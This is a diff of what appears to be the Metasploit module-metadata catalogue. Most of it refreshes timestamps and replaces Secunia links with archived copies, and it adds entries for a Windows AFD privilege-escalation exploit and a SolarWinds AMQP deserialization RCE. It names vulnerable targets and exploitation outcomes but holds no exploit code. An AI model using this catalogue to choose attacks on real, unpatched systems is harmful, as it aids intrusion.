@@ -122931,7 +123668,7 @@
      "Internet Explorer 6/7",
      "Internet Explorer 8 with JRE"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/imgeviewer_tifmergemultifiles",
@@ -122964,7 +123701,7 @@
      "OSVDB-72865",
      "BID-47596",
      "ZDI-12-168",
-      "URL-http://secunia.com/secunia_research/2011-37/"
+      "URL-http://web.archive.org/web/20110506063846/http://secunia.com:80/secunia_research/2011-37"
    ],
    "platform": "Windows",
    "arch": "",
@@ -122985,7 +123722,7 @@
      "IE 8 on Windows 7",
      "IE 9 on Windows 7"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/indusoft_issymbol_internationalseparator",
@@ -123520,7 +124257,7 @@
    "references": [
      "CVE-2007-5217",
      "OSVDB-37785",
-      "URL-http://secunia.com/advisories/26970/"
+      "URL-http://web.archive.org/web/20071014051150/http://secunia.com:80/advisories/26970"
    ],
    "platform": "Windows",
    "arch": "",
@@ -123534,7 +124271,7 @@
    "targets": [
      "Windows XP SP0-SP2 / IE 6.0SP1 English"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/browser/kazaa_altnet_heap.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/kazaa_altnet_heap",
@@ -123950,7 +124687,7 @@
    "references": [
      "CVE-2006-6707",
      "OSVDB-32399",
-      "URL-http://secunia.com/advisories/23463"
+      "URL-http://web.archive.org/web/20061223042405/http://secunia.com:80/advisories/23463/"
    ],
    "platform": "Windows",
    "arch": "",
@@ -123964,7 +124701,7 @@
    "targets": [
      "Windows XP Pro SP2 English"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/mcafeevisualtrace_tracetarget",
@@ -124563,7 +125300,7 @@
      "MSB-MS06-013",
      "BID-17196",
      "US-CERT-VU-876678",
-      "URL-http://secunia.com/secunia_research/2006-7/advisory/",
+      "URL-http://web.archive.org/web/20060418044756/http://secunia.com:80/secunia_research/2006-7/advisory/",
      "URL-https://seclists.org/lists/bugtraq/2006/Mar/0410.html",
      "URL-https://seclists.org/lists/fulldisclosure/2006/Mar/1439.html"
    ],
@@ -124580,7 +125317,7 @@
      "Internet Explorer 6 - (6.0.3790.0 - Windows XP SP2)",
      "Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/browser/ms06_013_createtextrange.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ms06_013_createtextrange",
@@ -126879,7 +127616,7 @@
    "references": [
      "CVE-2010-1527",
      "OSVDB-67411",
-      "URL-http://secunia.com/secunia_research/2010-104/",
+      "URL-http://web.archive.org/web/20100824204359/http://secunia.com:80/secunia_research/2010-104",
      "EDB-15042"
    ],
    "platform": "Windows",
@@ -126894,7 +127631,7 @@
    "targets": [
      "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/browser/novelliprint_callbackurl.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/novelliprint_callbackurl",
@@ -126923,7 +127660,7 @@
      "CVE-2009-1569",
      "BID-37242",
      "OSVDB-60804",
-      "URL-http://secunia.com/advisories/35004/"
+      "URL-http://web.archive.org/web/20091213033620/http://secunia.com:80/advisories/35004"
    ],
    "platform": "Windows",
    "arch": "",
@@ -126937,7 +127674,7 @@
    "targets": [
      "iPrint 5.30 Windows Client"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/browser/novelliprint_datetime.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/novelliprint_datetime",
@@ -127050,7 +127787,7 @@
    "references": [
      "CVE-2008-2908",
      "OSVDB-46194",
-      "URL-http://secunia.com/advisories/30709/"
+      "URL-http://web.archive.org/web/20081206030916/http://secunia.com:80/advisories/30709/"
    ],
    "platform": "Windows",
    "arch": "",
@@ -127064,7 +127801,7 @@
    "targets": [
      "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/browser/novelliprint_getdriversettings.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/novelliprint_getdriversettings",
@@ -127139,7 +127876,7 @@
      "CVE-2009-1568",
      "BID-37242",
      "OSVDB-60803",
-      "URL-http://secunia.com/advisories/37169/"
+      "URL-http://web.archive.org/web/20091213033630/http://secunia.com:80/advisories/37169"
    ],
    "platform": "Windows",
    "arch": "",
@@ -127153,7 +127890,7 @@
    "targets": [
      "iPrint 5.30 Windows Client"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/browser/novelliprint_target_frame.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/novelliprint_target_frame",
@@ -127183,7 +127920,7 @@
      "CVE-2012-0266",
      "OSVDB-78252",
      "BID-51374",
-      "URL-http://secunia.com/secunia_research/2012-1/"
+      "URL-http://web.archive.org/web/20120514113631/http://secunia.com/secunia_research/2012-1/"
    ],
    "platform": "Windows",
    "arch": "",
@@ -127204,7 +127941,7 @@
      "IE 8 on Windows 7",
      "IE 9 on Windows 7"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/browser/ntr_activex_check_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ntr_activex_check_bof",
@@ -127234,7 +127971,7 @@
      "CVE-2012-0267",
      "OSVDB-78253",
      "BID-51374",
-      "URL-http://secunia.com/secunia_research/2012-2/"
+      "URL-http://web.archive.org/web/20120122095846/http://secunia.com:80/secunia_research/2012-2"
    ],
    "platform": "Windows",
    "arch": "",
@@ -127251,7 +127988,7 @@
      "IE 7 on Windows XP SP3",
      "IE 7 on Windows Vista"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/browser/ntr_activex_stopmodule.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/ntr_activex_stopmodule",
@@ -127730,7 +128467,7 @@
      "CVE-2008-1309",
      "OSVDB-42946",
      "BID-28157",
-      "URL-http://secunia.com/advisories/29315/"
+      "URL-http://web.archive.org/web/20080313103656/http://secunia.com:80/advisories/29315/"
    ],
    "platform": "Windows",
    "arch": "",
@@ -127744,7 +128481,7 @@
    "targets": [
      "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0 English"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/browser/realplayer_console.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/realplayer_console",
@@ -128378,7 +129115,7 @@
      "CVE-2007-6016",
      "OSVDB-42358",
      "BID-26904",
-      "URL-http://secunia.com/advisories/27885/"
+      "URL-http://web.archive.org/web/20080302192347/http://secunia.com:80/advisories/27885/"
    ],
    "platform": "Windows",
    "arch": "",
@@ -128392,7 +129129,7 @@
    "targets": [
      "Windows XP SP0-SP2 / IE 6.0 SP0-2 & IE 7.0 English"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/symantec_backupexec_pvcalendar",
@@ -129408,7 +130145,7 @@
      "CVE-2010-3973",
      "BID-45546",
      "URL-http://wooyun.org/bug.php?action=view&id=1006",
-      "URL-http://secunia.com/advisories/42693",
+      "URL-http://web.archive.org/web/20101228043011/http://secunia.com:80/advisories/42693",
      "URL-http://www.microsoft.com/downloads/en/details.aspx?FamilyID=6430f853-1120-48db-8cc5-f2abdc3ed314"
    ],
    "platform": "Windows",
@@ -129425,7 +130162,7 @@
      "Windows Universal",
      "Debug Target (Crash)"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/browser/wmi_admintools.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/wmi_admintools",
@@ -129496,7 +130233,7 @@
      "CVE-2006-6063",
      "OSVDB-30537",
      "BID-21206",
-      "URL-http://secunia.com/advisories/22999/"
+      "URL-http://web.archive.org/web/20070502134818/http://secunia.com:80/advisories/22999"
    ],
    "platform": "Windows",
    "arch": "",
@@ -129511,7 +130248,7 @@
      "Windows 2000 Pro English SP4",
      "Windows XP Pro SP2 English"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/browser/xmplay_asx.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/xmplay_asx",
@@ -130941,7 +131678,7 @@
      "BID-38195",
      "OSVDB-62526",
      "URL-http://www.adobe.com/support/security/bulletins/apsb10-07.html",
-      "URL-http://secunia.com/blog/76/",
+      "URL-http://web.archive.org/web/20100223002318/http://secunia.com:80/blog/76",
      "URL-http://bugix-security.blogspot.com/2010/03/adobe-pdf-libtiff-working-exploitcve.html"
    ],
    "platform": "Windows",
@@ -130956,7 +131693,7 @@
    "targets": [
      "Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass)"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/fileformat/adobe_libtiff.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/adobe_libtiff",
@@ -132281,7 +133018,7 @@
      "CVE-2013-3928",
      "OSVDB-95689",
      "BID-61463",
-      "URL-http://secunia.com/advisories/53773/",
+      "URL-http://web.archive.org/web/20140326093457/http://secunia.com/advisories/53773/",
      "URL-http://longinox.blogspot.com/2013/08/explot-stack-based-overflow-bypassing.html"
    ],
    "platform": "Windows",
@@ -132296,7 +133033,7 @@
    "targets": [
      "Chasys Draw IES 4.10.01 / Windows XP SP3 / Windows 7 SP1"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/chasys_draw_ies_bmp_bof",
@@ -132371,7 +133108,7 @@
      "CVE-2013-3248",
      "OSVDB-94933",
      "BID-61010",
-      "URL-http://secunia.com/advisories/52707/"
+      "URL-http://web.archive.org/web/20130720043800/http://secunia.com:80/advisories/52707/"
    ],
    "platform": "Windows",
    "arch": "",
@@ -132385,7 +133122,7 @@
    "targets": [
      "Corel PDF Fusion 1.11 / Windows XP SP3"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/fileformat/corelpdf_fusion_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/corelpdf_fusion_bof",
@@ -132415,7 +133152,7 @@
      "CVE-2012-0270",
      "OSVDB-79491",
      "BID-52144",
-      "URL-http://secunia.com/secunia_research/2012-3/",
+      "URL-http://web.archive.org/web/20120514124556/http://secunia.com/secunia_research/2012-3/",
      "URL-http://csound.git.sourceforge.net/git/gitweb.cgi?p=csound/csound5.git;a=commit;h=7d617a9551fb6c552ba16874b71266fcd90f3a6f"
    ],
    "platform": "Windows",
@@ -132430,7 +133167,7 @@
    "targets": [
      "Csound 5.15 / Windows XP SP3 / Windows 7 SP1"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/fileformat/csound_getnum_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/csound_getnum_bof",
@@ -132775,7 +133512,7 @@
    "description": "This module exploits a buffer overflow in Digital Music Pad Version 8.2.3.3.4\n        When opening a malicious pls file with the Digital Music Pad,\n        a remote attacker could overflow a buffer and execute\n        arbitrary code.",
    "references": [
      "OSVDB-68178",
-      "URL-http://secunia.com/advisories/41519/",
+      "URL-http://web.archive.org/web/20100923154433/http://secunia.com:80/advisories/41519",
      "EDB-15134"
    ],
    "platform": "Windows",
@@ -132790,7 +133527,7 @@
    "targets": [
      "Windows XP SP2"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/fileformat/digital_music_pad_pls.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/digital_music_pad_pls",
@@ -133130,7 +133867,7 @@
      "CVE-2013-0726",
      "OSVDB-92694",
      "BID-59379",
-      "URL-http://secunia.com/advisories/51725/"
+      "URL-http://web.archive.org/web/20130515231047/http://secunia.com/advisories/51725/"
    ],
    "platform": "Windows",
    "arch": "",
@@ -133144,7 +133881,7 @@
    "targets": [
      "ERS Viewer 2011 (v11.04)  / Windows XP SP3 / Windows 7 SP1"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/erdas_er_viewer_bof",
@@ -133173,7 +133910,7 @@
    "references": [
      "CVE-2013-3482",
      "OSVDB-93650",
-      "URL-http://secunia.com/advisories/53620/"
+      "URL-http://web.archive.org/web/20130609135637/http://secunia.com:80/advisories/53620"
    ],
    "platform": "Windows",
    "arch": "",
@@ -133188,7 +133925,7 @@
      "ERS Viewer 2013 13.0.0.1151 / NO DEP / NO ASLR",
      "ERS Viewer 2013 13.0.0.1151 / DEP & ASLR bypass"
    ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/erdas_er_viewer_rf_report_error",
@@ -133397,7 +134134,7 @@
      "BID-33555",
      "URL-http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/vmsBtDownloadManager.cpp?r1=11&r2=18",
      "URL-http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/Bittorrent/fdmbtsupp/vmsBtFileImpl.cpp?r1=9&r2=18",
-      "URL-http://secunia.com/secunia_research/2009-5/",
+      "URL-http://web.archive.org/web/20090205145829/http://secunia.com:80/secunia_research/2009-5",
      "URL-http://downloads.securityfocus.com/vulnerabilities/exploits/33555-SkD.pl"
    ],
    "platform": "Windows",
@@ -133412,7 +134149,7 @@
    "targets": [
      "Free Download Manager 3.0 (Build 844)"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/fileformat/fdm_torrent.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/fdm_torrent",
@@ -134331,7 +135068,7 @@
    "references": [
      "OSVDB-82000",
      "BID-53562",
-      "URL-http://secunia.com/advisories/48740/"
+      "URL-http://web.archive.org/web/20121014002756/http://secunia.com/advisories/48740/"
    ],
    "platform": "Windows",
    "arch": "",
@@ -134345,7 +135082,7 @@
    "targets": [
      "ispVM System 18.0.2 / Windows XP SP3 / Windows 7 SP1"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/ispvm_xcf_ispxcf",
@@ -134422,7 +135159,7 @@
      "OSVDB-82001",
      "EDB-19006",
      "BID-53566",
-      "URL-http://secunia.com/advisories/48741"
+      "URL-http://web.archive.org/web/20120523175252/http://secunia.com:80/advisories/48741"
    ],
    "platform": "Windows",
    "arch": "",
@@ -134436,7 +135173,7 @@
    "targets": [
      "PAC-Designer 6.21 on Windows XP SP3"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/fileformat/lattice_pac_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/lattice_pac_bof",
@@ -139067,7 +139804,7 @@
      "CVE-2006-2961",
      "OSVDB-26364",
      "BID-18586",
-      "URL-http://secunia.com/advisories/20574/"
+      "URL-http://web.archive.org/web/20060619195555/http://secunia.com:80/advisories/20574/"
    ],
    "platform": "Windows",
    "arch": "",
@@ -139085,7 +139822,7 @@
      "Windows XP SP2/SP3 English",
      "Windows 2003 SP1 English"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/ftp/cesarftp_mkd.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/cesarftp_mkd",
@@ -140673,7 +141410,7 @@
    "references": [
      "CVE-2012-5002",
      "OSVDB-79691",
-      "URL-http://secunia.com/advisories/47912",
+      "URL-http://web.archive.org/web/20120514112629/http://secunia.com/advisories/47912/",
      "URL-http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/"
    ],
    "platform": "Windows",
@@ -140689,7 +141426,7 @@
    "targets": [
      "Windows XP SP3"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/ftp/ricoh_dl_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/ftp/ricoh_dl_bof",
@@ -148957,7 +149694,7 @@
    "references": [
      "CVE-2012-1465",
      "OSVDB-79651",
-      "URL-http://secunia.com/advisories/48168/",
+      "URL-http://web.archive.org/web/20121024124508/http://secunia.com/advisories/48168/",
      "URL-http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_Vuln.txt"
    ],
    "platform": "Windows",
@@ -148981,7 +149718,7 @@
    "targets": [
      "NetDecision 4.5.1 on XP SP3"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/http/netdecision_http_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/http/netdecision_http_bof",
@@ -150236,8 +150973,7 @@
    "description": "This module exploits a vulnerability found in RabidHamster R4's web server.\n        By supplying a malformed HTTP request, it is possible to trigger a stack-based\n        buffer overflow when generating a log, which may result in arbitrary code\n        execution under the context of the user.",
    "references": [
      "OSVDB-79007",
-      "URL-http://aluigi.altervista.org/adv/r4_1-adv.txt",
-      "URL-http://secunia.com/advisories/47901/"
+      "URL-http://aluigi.altervista.org/adv/r4_1-adv.txt"
    ],
    "platform": "Windows",
    "arch": "",
@@ -150260,7 +150996,7 @@
    "targets": [
      "R4 v1.25"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/http/rabidhamster_r4_log.rb",
    "is_install_path": true,
    "ref_name": "windows/http/rabidhamster_r4_log",
@@ -154147,7 +154883,7 @@
      "CVE-2004-0297",
      "OSVDB-3984",
      "BID-9682",
-      "URL-http://secunia.com/advisories/10880/"
+      "URL-http://web.archive.org/web/20060110155821/http://secunia.com:80/advisories/10880/"
    ],
    "platform": "Windows",
    "arch": "",
@@ -154162,7 +154898,7 @@
      "Windows 2000 English",
      "Windows 2000 IMail 8.x"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/ldap/imail_thc.rb",
    "is_install_path": true,
    "ref_name": "windows/ldap/imail_thc",
@@ -156665,6 +157401,62 @@
    ],
    "needs_cleanup": null
  },
+  "exploit_windows/local/cve_2023_21768_afd_lpe": {
+    "name": "Ancillary Function Driver (AFD) for WinSock Elevation of Privilege",
+    "fullname": "exploit/windows/local/cve_2023_21768_afd_lpe",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2023-01-10",
+    "type": "exploit",
+    "author": [
+      "chompie",
+      "b33f",
+      "Yarden Shafir",
+      "Christophe De La Fuente"
+    ],
+    "description": "A vulnerability exists in the Windows Ancillary Function Driver for Winsock\n            (`afd.sys`) can be leveraged by an attacker to escalate privileges to those of\n            NT AUTHORITY\\SYSTEM. Due to a flaw in `AfdNotifyRemoveIoCompletion`, it is\n            possible to create an arbitrary kernel Write-Where primitive, which can be used\n            to manipulate internal I/O ring structures and achieve local privilege\n            escalation.\n\n            This exploit only supports Windows 11 22H2 up to build 22621.963 (patched in\n            January 2023 updates).",
+    "references": [
+      "CVE-2023-21768",
+      "URL-https://github.com/xforcered/Windows_LPE_AFD_CVE-2023-21768",
+      "URL-https://github.com/yardenshafir/IoRingReadWritePrimitive"
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows 11 22H2 x64"
+    ],
+    "mod_time": "2023-03-30 11:28:46 +0000",
+    "path": "/modules/exploits/windows/local/cve_2023_21768_afd_lpe.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/cve_2023_21768_afd_lpe",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null
+  },
  "exploit_windows/local/dnsadmin_serverlevelplugindll": {
    "name": "DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation",
    "fullname": "exploit/windows/local/dnsadmin_serverlevelplugindll",
@@ -160628,7 +161420,7 @@
      "BID-47947",
      "EDB-18397",
      "URL-https://downloads.avaya.com/css/P8/documents/100140122",
-      "URL-http://secunia.com/advisories/44062"
+      "URL-http://web.archive.org/web/20110527165515/http://secunia.com:80/advisories/44062"
    ],
    "platform": "Windows",
    "arch": "",
@@ -160643,7 +161435,7 @@
      "Avaya WinPMD 3.8.2 / Windows XP SP3",
      "Avaya WinPMD 3.8.2 / Windows 2003 SP2"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/avaya_winpmd_unihostrouter",
@@ -161207,7 +161999,7 @@
    "references": [
      "OSVDB-70597",
      "ZDI-11-023",
-      "URL-http://secunia.com/advisories/42954/",
+      "URL-http://web.archive.org/web/20110123164820/http://secunia.com:80/advisories/42954/",
      "URL-http://support.citrix.com/article/CTX127149"
    ],
    "platform": "Windows",
@@ -161222,7 +162014,7 @@
    "targets": [
      "Windows XP SP3 / Windows Server 2003 SP2 / Windows Vista"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/misc/citrix_streamprocess.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/citrix_streamprocess",
@@ -164623,6 +165415,60 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/misc/solarwinds_amqp_deserialization": {
+    "name": "SolarWinds Information Service (SWIS) .NET Deserialization From AMQP RCE",
+    "fullname": "exploit/windows/misc/solarwinds_amqp_deserialization",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-10-19",
+    "type": "exploit",
+    "author": [
+      "Justin Hong",
+      "Lucas Miller",
+      "Piotr Bazydło",
+      "Spencer McIntyre"
+    ],
+    "description": "The SolarWinds Information Service (SWIS) is vulnerable to RCE by way of a crafted message received through the\n        AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted\n        message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\\SYSTEM.",
+    "references": [
+      "CVE-2022-38108",
+      "URL-https://www.zerodayinitiative.com/blog/2023/2/27/cve-2022-38108-rce-in-solarwinds-network-performance-monitor",
+      "URL-https://www.solarwinds.com/trust-center/security-advisories/cve-2022-38108"
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": 5671,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2023-03-23 17:28:17 +0000",
+    "path": "/modules/exploits/windows/misc/solarwinds_amqp_deserialization.rb",
+    "is_install_path": true,
+    "ref_name": "windows/misc/solarwinds_amqp_deserialization",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/misc/solidworks_workgroup_pdmwservice_file_write": {
    "name": "SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write",
    "fullname": "exploit/windows/misc/solidworks_workgroup_pdmwservice_file_write",
@@ -164728,7 +165574,7 @@
      "OSVDB-78043",
      "BID-51190",
      "URL-http://www.dark-masters.tk/",
-      "URL-http://secunia.com/advisories/47343/",
+      "URL-http://web.archive.org/web/20121024141958/http://secunia.com/advisories/47343",
      "EDB-18283"
    ],
    "platform": "Windows",
@@ -164743,7 +165589,7 @@
    "targets": [
      "StreamDown 6.8.0"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/misc/stream_down_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/stream_down_bof",
@@ -166047,7 +166893,7 @@
    "references": [
      "CVE-2012-3951",
      "OSVDB-84317",
-      "URL-http://secunia.com/advisories/50074/",
+      "URL-http://web.archive.org/web/20140722224651/http://secunia.com/advisories/50074/",
      "URL-https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
    ],
    "platform": "Windows",
@@ -166071,7 +166917,7 @@
    "targets": [
      "Scrutinizer NetFlow and sFlow Analyzer 9.5.2 or older"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/mysql/scrutinizer_upload_exec",
@@ -171917,7 +172763,7 @@
      "CVE-2008-1610",
      "OSVDB-43784",
      "BID-28459",
-      "URL-http://secunia.com/advisories/29494"
+      "URL-http://web.archive.org/web/20080330000001/http://secunia.com:80/advisories/29494/"
    ],
    "platform": "Windows",
    "arch": "",
@@ -171932,7 +172778,7 @@
      "Windows Server 2000",
      "Windows XP SP2"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb",
    "is_install_path": true,
    "ref_name": "windows/tftp/quick_tftp_pro_mode",
@@ -172099,7 +172945,7 @@
      "CVE-2006-6183",
      "OSVDB-30758",
      "BID-21301",
-      "URL-http://secunia.com/advisories/23113/"
+      "URL-http://web.archive.org/web/20070521014920/http://secunia.com:80/advisories/23113"
    ],
    "platform": "Windows",
    "arch": "",
@@ -172113,7 +172959,7 @@
    "targets": [
      "3CTftpSvc 2.0.1"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-03-23 10:19:30 +0000",
    "path": "/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb",
    "is_install_path": true,
    "ref_name": "windows/tftp/threectftpsvc_long_mode",
@@ -173031,7 +173877,7 @@
      "OJ Reeves",
      "anwarelmakrahy"
    ],
-    "description": "Run a meterpreter server in Android. Tunnel communication over HTTP",
+    "description": "Run a meterpreter server in Android.\n\nTunnel communication over HTTP",
    "references": [

    ],
@@ -173068,7 +173914,7 @@
      "OJ Reeves",
      "anwarelmakrahy"
    ],
-    "description": "Run a meterpreter server in Android. Tunnel communication over HTTPS",
+    "description": "Run a meterpreter server in Android.\n\nTunnel communication over HTTPS",
    "references": [

    ],
@@ -173104,7 +173950,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Run a meterpreter server in Android. Connect back stager",
+    "description": "Run a meterpreter server in Android.\n\nConnect back stager",
    "references": [

    ],
@@ -173243,7 +174089,7 @@
      "anwarelmakrahy",
      "OJ Reeves"
    ],
-    "description": "Spawn a piped command shell (sh). Tunnel communication over HTTP",
+    "description": "Spawn a piped command shell (sh).\n\nTunnel communication over HTTP",
    "references": [

    ],
@@ -173280,7 +174126,7 @@
      "anwarelmakrahy",
      "OJ Reeves"
    ],
